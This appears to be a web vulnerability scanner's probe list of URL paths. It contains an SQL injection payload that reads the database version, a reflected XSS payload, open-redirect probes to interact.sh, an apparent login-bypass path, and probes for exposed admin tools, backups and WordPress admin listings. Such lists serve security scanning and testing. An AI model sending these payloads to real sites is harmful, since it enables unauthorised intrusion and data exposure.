/signin
/index.php/api/modular-connector/login/{{string}}?origin=mo&type=foo
/api/modular-connector/login/{{string}}?origin=mo&type=foo
/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--
/api/raster/search/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--
/adminer.php
/editor.php
/adminer/
/api/backup

/rss/watch/%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E?token={{rss_token}}
/wp-json/mrm/v1/wp/admins?term=@
/api/status
/api/setup-complete
/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=bfcm_2025_offer&redirect_to=https://interact.sh
/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=welcome_offer&redirect_to=https://interact.sh
/api/4/system
/api/4/processlist
